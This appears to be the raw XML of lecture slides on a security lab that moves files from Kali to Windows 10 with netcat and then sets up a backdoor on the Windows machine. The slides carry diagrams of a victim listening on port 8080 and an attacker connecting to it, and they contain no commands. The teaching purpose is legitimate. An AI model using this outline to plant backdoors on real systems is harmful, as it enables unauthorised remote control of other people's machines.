            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2871076-CFC8-4CD5-BF65-ECB4ACAEF8D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25061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Transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="997234" y="1818895"/>
            <a:ext cx="8953541" cy="3706976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311612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Your work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6297084"/>
            <a:ext cx="732367" cy="524933"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3933795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Goal : Communication between two machines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="40116" y="2118247"/>
            <a:ext cx="12111769" cy="2621507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="684404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Goal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send files from Kali to Windows 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zenmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is integrated into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zenmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3211001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E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="757675" y="1053703"/>
            <a:ext cx="10258981" cy="4763500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2427580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E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Bent-Up Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6948606" y="3353537"/>
            <a:ext cx="1035004" cy="113148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7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6360017" y="4733552"/>
            <a:ext cx="5068007" cy="1092352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1"/>
            <a:ext cx="6399252" cy="4140017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156228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Create a backdoor at Window 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6297084"/>
            <a:ext cx="732367" cy="524933"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1035595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Backdoor background</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="691306" y="3101419"/>
            <a:ext cx="9244345" cy="2167923"/>
            <a:chOff x="1220568" y="4947656"/>
            <a:chExt cx="16789969" cy="4722849"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="pasted-image.tif"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220568" y="6319169"/>
              <a:ext cx="2050617" cy="2050617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4531579" y="5705086"/>
              <a:ext cx="2122268" cy="1112395"/>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sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>std input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4550624" y="7663171"/>
              <a:ext cx="2164425" cy="1023276"/>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sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1867" dirty="0"/>
                <a:t>std output</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 203"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3381619" y="6442023"/>
              <a:ext cx="1083158" cy="438163"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3321689" y="7804900"/>
              <a:ext cx="1079942" cy="355834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Picture 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579816" y="6023612"/>
              <a:ext cx="5434477" cy="101603"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="6463892"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="7937137"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="8428218"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Shape 213"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="12026615" y="6185254"/>
              <a:ext cx="1092679" cy="38024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7" name="Shape 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12117936" y="7804899"/>
              <a:ext cx="838107" cy="523630"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8298014" y="6294553"/>
              <a:ext cx="2390972"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9" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8233576" y="8233479"/>
              <a:ext cx="2519848"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40" name="Shape 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8901674" y="4947656"/>
              <a:ext cx="1379383" cy="1529499"/>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dirty="0" err="1"/>
                <a:t>tcp</a:t>
              </a:r>
              <a:endParaRPr sz="3377" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9012254" y="8141006"/>
              <a:ext cx="1379383" cy="1529499"/>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a:t>tcp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13351927" y="6095079"/>
              <a:ext cx="3841634" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>puts input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13246136" y="7266198"/>
              <a:ext cx="4764401" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>receive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2133" dirty="0"/>
                <a:t> output</a:t>
              </a:r>
              <a:endParaRPr sz="2133" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9675751" y="3705465"/>
            <a:ext cx="1357165" cy="870848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774914" y="4722416"/>
            <a:ext cx="851932" cy="674832"/>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b="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9800404" y="4675773"/>
            <a:ext cx="1097577" cy="674832"/>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b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Attacker </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for attack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4445" y="1514459"/>
            <a:ext cx="990052" cy="990052"/>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Arrow Connector 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1026" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1561278" y="2009485"/>
            <a:ext cx="3353167"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74914" y="1985521"/>
            <a:ext cx="3100220" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Let a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to a hidden communication channel (backdoor)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793921" y="1809876"/>
            <a:ext cx="3132976" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a signal to activate the communication channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5939975" y="2009485"/>
            <a:ext cx="4112859"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385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6082" y="683666"/>
            <a:ext cx="4483725" cy="1105055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86082" y="1924968"/>
            <a:ext cx="4166329" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Server listens port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
